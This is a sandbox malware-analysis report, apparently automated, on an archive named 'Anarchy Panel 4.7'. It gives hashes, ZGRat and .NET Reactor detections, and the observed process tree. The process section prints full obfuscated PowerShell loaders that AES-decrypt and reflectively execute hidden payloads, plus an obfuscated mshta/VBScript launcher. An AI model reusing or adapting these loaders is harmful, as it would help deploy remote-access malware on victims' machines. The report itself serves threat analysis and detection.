Overview
overview
10Static
static
10Anarchy Panel 4.7.zip
windows7-x64
1Anarchy Panel 4.7.zip
windows10-2004-x64
10Anarchy Pa...el.exe
windows7-x64
10Anarchy Pa...el.exe
windows10-2004-x64
10Anarchy Pa...oG.dll
windows7-x64
1Anarchy Pa...oG.dll
windows10-2004-x64
1Anarchy Pa...uJ.dll
windows7-x64
1Anarchy Pa...uJ.dll
windows10-2004-x64
1Anarchy Pa...qM.dll
windows7-x64
1Anarchy Pa...qM.dll
windows10-2004-x64
1Anarchy Pa...LC.dll
windows7-x64
1Anarchy Pa...LC.dll
windows10-2004-x64
1Anarchy Pa...wp.dll
windows7-x64
1Anarchy Pa...wp.dll
windows10-2004-x64
1Anarchy Pa...uZ.dll
windows7-x64
1Anarchy Pa...uZ.dll
windows10-2004-x64
1Anarchy Pa...nG.dll
windows7-x64
1Anarchy Pa...nG.dll
windows10-2004-x64
1Anarchy Pa...TS.dll
windows7-x64
1Anarchy Pa...TS.dll
windows10-2004-x64
1Anarchy Pa...xj.dll
windows7-x64
1Anarchy Pa...xj.dll
windows10-2004-x64
1Anarchy Pa...pi.dll
windows7-x64
1Anarchy Pa...pi.dll
windows10-2004-x64
1Anarchy Pa...s4.dll
windows7-x64
1Anarchy Pa...s4.dll
windows10-2004-x64
1Anarchy Pa...Ya.dll
windows7-x64
1Anarchy Pa...Ya.dll
windows10-2004-x64
1Anarchy Pa...Jn.dll
windows7-x64
1Anarchy Pa...Jn.dll
windows10-2004-x64
1Anarchy Pa...GA.dll
windows7-x64
1Anarchy Pa...GA.dll
windows10-2004-x64
1Analysis
-
max time kernel
9s -
max time network
53s -
platform
windows10-2004_x64 -
resource
win10v2004-20231020-en -
resource tags
arch:x64arch:x86image:win10v2004-20231020-enlocale:en-usos:windows10-2004-x64system -
submitted
26-11-2023 16:10
Behavioral task
behavioral1
Sample
Anarchy Panel 4.7.zip
Resource
win7-20231023-en
Behavioral task
behavioral2
Sample
Anarchy Panel 4.7.zip
Resource
win10v2004-20231023-en
Behavioral task
behavioral3
Sample
Anarchy Panel 4.7/Anarchy Panel.exe
Resource
win7-20231020-en
Behavioral task
behavioral4
Sample
Anarchy Panel 4.7/Anarchy Panel.exe
Resource
win10v2004-20231020-en
Behavioral task
behavioral5
Sample
Anarchy Panel 4.7/Plugins/0guo3zbo66fqoG.dll
Resource
win7-20231023-en
Behavioral task
behavioral6
Sample
Anarchy Panel 4.7/Plugins/0guo3zbo66fqoG.dll
Resource
win10v2004-20231023-en
Behavioral task
behavioral7
Sample
Anarchy Panel 4.7/Plugins/59Zp7paEHDF7luJ.dll
Resource
win7-20231020-en
Behavioral task
behavioral8
Sample
Anarchy Panel 4.7/Plugins/59Zp7paEHDF7luJ.dll
Resource
win10v2004-20231025-en
Behavioral task
behavioral9
Sample
Anarchy Panel 4.7/Plugins/CjETR6GpGXqM.dll
Resource
win7-20231023-en
Behavioral task
behavioral10
Sample
Anarchy Panel 4.7/Plugins/CjETR6GpGXqM.dll
Resource
win10v2004-20231023-en
Behavioral task
behavioral11
Sample
Anarchy Panel 4.7/Plugins/EVa7gBMKoaHmLC.dll
Resource
win7-20231023-en
Behavioral task
behavioral12
Sample
Anarchy Panel 4.7/Plugins/EVa7gBMKoaHmLC.dll
Resource
win10v2004-20231020-en
Behavioral task
behavioral13
Sample
Anarchy Panel 4.7/Plugins/FBSyChwp.dll
Resource
win7-20231023-en
Behavioral task
behavioral14
Sample
Anarchy Panel 4.7/Plugins/FBSyChwp.dll
Resource
win10v2004-20231020-en
Behavioral task
behavioral15
Sample
Anarchy Panel 4.7/Plugins/G3nl0mDcABnDuZ.dll
Resource
win7-20231020-en
Behavioral task
behavioral16
Sample
Anarchy Panel 4.7/Plugins/G3nl0mDcABnDuZ.dll
Resource
win10v2004-20231025-en
Behavioral task
behavioral17
Sample
Anarchy Panel 4.7/Plugins/KNTmoSnG.dll
Resource
win7-20231023-en
Behavioral task
behavioral18
Sample
Anarchy Panel 4.7/Plugins/KNTmoSnG.dll
Resource
win10v2004-20231023-en
Behavioral task
behavioral19
Sample
Anarchy Panel 4.7/Plugins/PK0TcnqTGFagQTS.dll
Resource
win7-20231025-en
Behavioral task
behavioral20
Sample
Anarchy Panel 4.7/Plugins/PK0TcnqTGFagQTS.dll
Resource
win10v2004-20231020-en
Behavioral task
behavioral21
Sample
Anarchy Panel 4.7/Plugins/RssCnLKcGRxj.dll
Resource
win7-20231023-en
Behavioral task
behavioral22
Sample
Anarchy Panel 4.7/Plugins/RssCnLKcGRxj.dll
Resource
win10v2004-20231023-en
Behavioral task
behavioral23
Sample
Anarchy Panel 4.7/Plugins/WkUP83aP9CABpi.dll
Resource
win7-20231020-en
Behavioral task
behavioral24
Sample
Anarchy Panel 4.7/Plugins/WkUP83aP9CABpi.dll
Resource
win10v2004-20231020-en
Behavioral task
behavioral25
Sample
Anarchy Panel 4.7/Plugins/eMTYbTz0gueNs4.dll
Resource
win7-20231023-en
Behavioral task
behavioral26
Sample
Anarchy Panel 4.7/Plugins/eMTYbTz0gueNs4.dll
Resource
win10v2004-20231023-en
Behavioral task
behavioral27
Sample
Anarchy Panel 4.7/Plugins/fzAgyDYa.dll
Resource
win7-20231020-en
Behavioral task
behavioral28
Sample
Anarchy Panel 4.7/Plugins/fzAgyDYa.dll
Resource
win10v2004-20231020-en
Behavioral task
behavioral29
Sample
Anarchy Panel 4.7/Plugins/mGWHaG2Jn.dll
Resource
win7-20231023-en
Behavioral task
behavioral30
Sample
Anarchy Panel 4.7/Plugins/mGWHaG2Jn.dll
Resource
win10v2004-20231025-en
Behavioral task
behavioral31
Sample
Anarchy Panel 4.7/Plugins/mML6WKMqdxjDGA.dll
Resource
win7-20231020-en
Behavioral task
behavioral32
Sample
Anarchy Panel 4.7/Plugins/mML6WKMqdxjDGA.dll
Resource
win10v2004-20231023-en
General
-
Target
Anarchy Panel 4.7/Anarchy Panel.exe
-
Size
57.8MB
-
MD5
b278ec8cce77cdf9a1d71f19d035226f
-
SHA1
10f10d3cd6dbe6a7dba851ccafa883bf7738c904
-
SHA256
7e12be0dfed24554ac520ec7cf5ec1ee0239727e4f8866ea30a85a56903b219a
-
SHA512
3da33e91e1628097976b6f4fce5020a128a5f1a56242769feacd49f2f67fee23b3ac0361c12f5bd06576b10449712bf7d7545f94a99532113fbb0abff40b2c51
-
SSDEEP
1572864:+j2hoiTM651kZ0gIToFSO9PzN9qUyO0yMS:+j2hoiTz7i77dxPyH6
Malware Config
Signatures
-
Detect ZGRat V1 4 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\Anarchy Panel.exe family_zgrat_v1 C:\Users\Admin\AppData\Local\Temp\Anarchy Panel.exe family_zgrat_v1 C:\Users\Admin\AppData\Local\Temp\Anarchy Panel.exe family_zgrat_v1 behavioral4/memory/2708-17-0x0000000000460000-0x0000000003AFE000-memory.dmp family_zgrat_v1 -
.NET Reactor proctector 4 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\Anarchy Panel.exe net_reactor C:\Users\Admin\AppData\Local\Temp\Anarchy Panel.exe net_reactor C:\Users\Admin\AppData\Local\Temp\Anarchy Panel.exe net_reactor behavioral4/memory/2708-17-0x0000000000460000-0x0000000003AFE000-memory.dmp net_reactor -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
Processes
-
C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Anarchy Panel.exe"C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Anarchy Panel.exe"1⤵PID:2556
-
C:\Users\Admin\AppData\Local\Temp\Anarchy Panel.exe"C:\Users\Admin\AppData\Local\Temp\Anarchy Panel.exe"2⤵PID:2708
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\svchost.bat" "2⤵PID:6044
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass -noprofile -windowstyle hidden3⤵PID:3532
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function ZSHdk($KarSC){ $ZfCFn=[System.Security.Cryptography.Aes]::Create(); $ZfCFn.Mode=[System.Security.Cryptography.CipherMode]::CBC; $ZfCFn.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $ZfCFn.Key=[System.Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))('KtZKjEms98+Uz3JdAwXifcpceQe4mGFCZZetPfWLjV8='); $ZfCFn.IV=[System.Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))('XxhTpYt8KLdLDSpO7hDOxw=='); $tlguC=$ZfCFn.CreateDecryptor(); $return_var=$tlguC.TransformFinalBlock($KarSC, 0, $KarSC.Length); $tlguC.Dispose(); $ZfCFn.Dispose(); $return_var;}function CaoMW($KarSC){ $tLaFs=New-Object System.IO.MemoryStream(,$KarSC); $lDGtw=New-Object System.IO.MemoryStream; Invoke-Expression '$ixeoS #=# #N#e#w#-#O#b#j#e#c#t# #S#y#s#t#e#m#.#I#O#.#C#o#m#p#r#e#s#s#i#o#n#.#G#Z#i#p#S#t#r#e#a#m#(#$tLaFs,# #[#I#O#.#C#o#m#p#r#e#s#s#i#o#n#.#C#o#m#p#r#e#s#s#i#o#n#M#o#d#e#]#:#:#D#e#c#o#m#p#r#e#s#s#)#;#'.Replace('#', ''); $ixeoS.CopyTo($lDGtw); $ixeoS.Dispose(); $tLaFs.Dispose(); $lDGtw.Dispose(); $lDGtw.ToArray();}function akbWW($KarSC,$vyQOD){ $xXjIa = @( '$qtafy = [System.Reflection.Assembly]::("@L@o@a@d@".Replace("@", ""))([byte[]]$KarSC);', '$FBuAc = $qtafy.EntryPoint;', '$FBuAc.Invoke($null, $vyQOD);' ); foreach ($eBUTc in $xXjIa) { Invoke-Expression $eBUTc };}$QCWfW=[System.IO.File]::("@R@e@a@d@A@l@l@T@e@x@t@".Replace("@", ""))('C:\Users\Admin\AppData\Local\Temp\svchost.bat').Split([Environment]::NewLine);foreach ($hgEiC in $QCWfW) { if ($hgEiC.StartsWith('SEROXEN')) { $GFlqW=$hgEiC.Substring(7); break; }}$llOQb=CaoMW (ZSHdk ([Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))($GFlqW)));akbWW $llOQb (,[string[]] ('C:\Users\Admin\AppData\Local\Temp\svchost.bat')); "3⤵PID:3080
-
C:\Windows\$sxr-mshta.exeC:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-TwfkFnoyLGWlxhzmArsw4312:WkABOEMU=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"1⤵PID:2976
-
C:\Windows\$sxr-cmd.exe"C:\Windows\$sxr-cmd.exe" /c %$sxr-TwfkFnoyLGWlxhzmArsw4312:WkABOEMU=%2⤵PID:5336
-
C:\Windows\$sxr-powershell.exeC:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass3⤵PID:3916
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function ASDgm($hbtlH){ $jvCLB=[System.Security.Cryptography.Aes]::Create(); $jvCLB.Mode=[System.Security.Cryptography.CipherMode]::CBC; $jvCLB.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $jvCLB.Key=[System.Convert]::('@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@'.Replace('@', ''))('blz4wP7NQ0z9G5HU5qt1rBXWDUDwhPjk4R14Im6s+lY='); $jvCLB.IV=[System.Convert]::('@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@'.Replace('@', ''))('tyHaD0iUmC1atKVX/rbjZw=='); $bkHaC=$jvCLB.('@C@r@e@a@t@e@D@e@c@r@y@p@t@o@r@'.Replace('@', ''))(); $KdWyo=$bkHaC.('@T@r@a@n@s@f@o@r@m@F@i@n@a@l@B@l@o@c@k@'.Replace('@', ''))($hbtlH, 0, $hbtlH.Length); $bkHaC.Dispose(); $jvCLB.Dispose(); $KdWyo;}function cHftl($hbtlH){ $ZLGfO=New-Object System.IO.MemoryStream(,$hbtlH); $pEGfA=New-Object System.IO.MemoryStream; Invoke-Expression '$YNTor @=@ @N@e@w@-@O@b@j@e@c@t@ @S@y@s@t@e@m@.@I@O@.@C@o@m@p@r@e@s@s@i@o@n@.@G@Z@i@p@S@t@r@e@a@m@(@$ZLGfO,@ @[@I@O@.@C@o@m@p@r@e@s@s@i@o@n@.@C@o@m@p@r@e@s@s@i@o@n@M@o@d@e@]@:@:@D@e@c@o@m@p@r@e@s@s@)@;@'.Replace('@', ''); $YNTor.CopyTo($pEGfA); $YNTor.Dispose(); $ZLGfO.Dispose(); $pEGfA.Dispose(); $pEGfA.ToArray();}function cDPce($hbtlH){ $KdWyo = [System.Convert]::('@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@'.Replace('@', ''))($hbtlH); $KdWyo = ASDgm($KdWyo); $KdWyo = [System.Text.Encoding]::('@U@T@F@8@'.Replace('@', '')).('@G@e@t@S@t@r@i@n@g@'.Replace('@', ''))($KdWyo); return $KdWyo;}function execute_function($hbtlH,$HyIWf){ $wMvLZ = @( '$gbejj = [System.Reflection.Assembly]::Load([byte[]]$hbtlH);', '$nYAXe = $gbejj.EntryPoint;', '$nYAXe.Invoke($null, $HyIWf);' ); foreach ($XGPPP in $wMvLZ) { Invoke-Expression $XGPPP };}$WwewB = cDPce('6jh9/JwNM6P3zg5yY8XZBg==');$pAwEN = cDPce('ZViCuth6vUsFE5+msWnrZo/mOl8APvimIOP0OBotRXY=');$EiozW = cDPce('e/do7iEa4WyK+N/slo150A==');$xMYjW = cDPce('0AZpRDqOSBwoRnb0ckOSHA==');if (@(get-process -ea silentlycontinue $xMYjW).count -gt 1) {exit};$AmhAI = [Microsoft.Win32.Registry]::('@L@o@c@a@l@M@a@c@h@i@n@e@'.Replace('@', '')).('@O@p@e@n@S@u@b@k@e@y@'.Replace('@', ''))($WwewB).('@G@e@t@V@a@l@u@e@'.Replace('@', ''))($pAwEN);$lPNsi=cHftl (ASDgm ([Convert]::('@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@'.Replace('@', ''))($AmhAI)));execute_function $lPNsi (,[string[]] ($EiozW)); "3⤵PID:228
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
53KB
MD5a26df49623eff12a70a93f649776dab7
SHA1efb53bd0df3ac34bd119adf8788127ad57e53803
SHA2564ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245
SHA512e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c
-
Filesize
16.0MB
MD59f98dfa9c4b041b8dd9d2f9c6f5aa204
SHA1360b4dafc99be4694578dc261381ac1b425a031a
SHA25687afb748f4283e82a48c222cf4ce7a606f1da50bb96b2d8d746400156e6b9931
SHA51266c55751969f28a42d6515e36fd1f54f23ad626ad0279da3a86fa9fdc46c96740c3429c0c52a6d3b93fbe5e9077390c97c4dc3c435bac98a3ab78fb6747fe14f
-
Filesize
18.3MB
MD503a9b13f688b71cb9000de27245ab1ca
SHA13ab871551a731166c74c6d4be595dfaaefc26cb3
SHA256aff5e028e6b17bb60274fc81fc8e9b663a049150a19db6fc07ffbda5cb86edce
SHA5124ea5d3b2b4b0849c84dad1b5c1a79c6f548a91b249e1681eb83f3229666b9389886a4e073c98556a89c91c2ab93739afebdff2a4d815c62efffbe5216820a174
-
Filesize
17.0MB
MD5bb27d6dae194a741ab35d8788f35dfd8
SHA168e07cc8b30a89c091e4f5faf946756f9926758e
SHA2564676fc6e30e0ddf1bf46eb866d1a089bbd04e46c13be4403a50c69cae898e875
SHA512e3895f3b4114dd12cd2424c06865f556f863966ef513af49e2c9b8dd0c8a58429ed2642a7066e5a2ada22b96be096a130022562a930030a71105f59ba5ac2641
-
Filesize
1.7MB
MD556a504a34d2cfbfc7eaa2b68e34af8ad
SHA1426b48b0f3b691e3bb29f465aed9b936f29fc8cc
SHA2569309fb2a3f326d0f2cc3f2ab837cfd02e4f8cb6b923b3b2be265591fd38f4961
SHA512170c3645083d869e2368ee16325d7edaeba2d8f1d3d4a6a1054cfdd8616e03073772eeae30c8f79a93173825f83891e7b0e4fd89ef416808359f715a641747d7
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
11.9MB
MD52892f2caa15e37c12faea09c6bb5a44a
SHA18f401732b8a3a8b1022ef52836a4e7eac604146a
SHA256c5ece24bcd43419cf718605925b565c17bc668ab7d3801a1d923465b15bd9f1f
SHA51235abceb95d61ba4bfb6facc9559fe4d2db3eec9810bff4230c697864e0bd37e58ec1c1d817a766cfc07b12bed0dfedecfab01179f7295d1118347ba432ee996d
-
Filesize
283KB
MD58a2122e8162dbef04694b9c3e0b6cdee
SHA1f1efb0fddc156e4c61c5f78a54700e4e7984d55d
SHA256b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450
SHA51299e784141193275d4364ba1b8762b07cc150ca3cb7e9aa1d4386ba1fa87e073d0500e61572f8d1b071f2faa2a51bb123e12d9d07054b59a1a2fd768ad9f24397
-
Filesize
283KB
MD58a2122e8162dbef04694b9c3e0b6cdee
SHA1f1efb0fddc156e4c61c5f78a54700e4e7984d55d
SHA256b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450
SHA51299e784141193275d4364ba1b8762b07cc150ca3cb7e9aa1d4386ba1fa87e073d0500e61572f8d1b071f2faa2a51bb123e12d9d07054b59a1a2fd768ad9f24397
-
Filesize
14KB
MD50b4340ed812dc82ce636c00fa5c9bef2
SHA151c97ebe601ef079b16bcd87af827b0be5283d96
SHA256dba3137811c686fd35e418d76184070e031f207002649da95385dfd05a8bb895
SHA512d9df8c1f093ea0f7bde9c356349b2ba43e3ca04b4c87c0f33ab89dda5afe9966313a09b60720aa22a1a25d43d7c71a060af93fb8f6488201a0e301c83fa18045
-
Filesize
14KB
MD50b4340ed812dc82ce636c00fa5c9bef2
SHA151c97ebe601ef079b16bcd87af827b0be5283d96
SHA256dba3137811c686fd35e418d76184070e031f207002649da95385dfd05a8bb895
SHA512d9df8c1f093ea0f7bde9c356349b2ba43e3ca04b4c87c0f33ab89dda5afe9966313a09b60720aa22a1a25d43d7c71a060af93fb8f6488201a0e301c83fa18045
-
Filesize
442KB
MD504029e121a0cfa5991749937dd22a1d9
SHA1f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA2569f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA5126a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b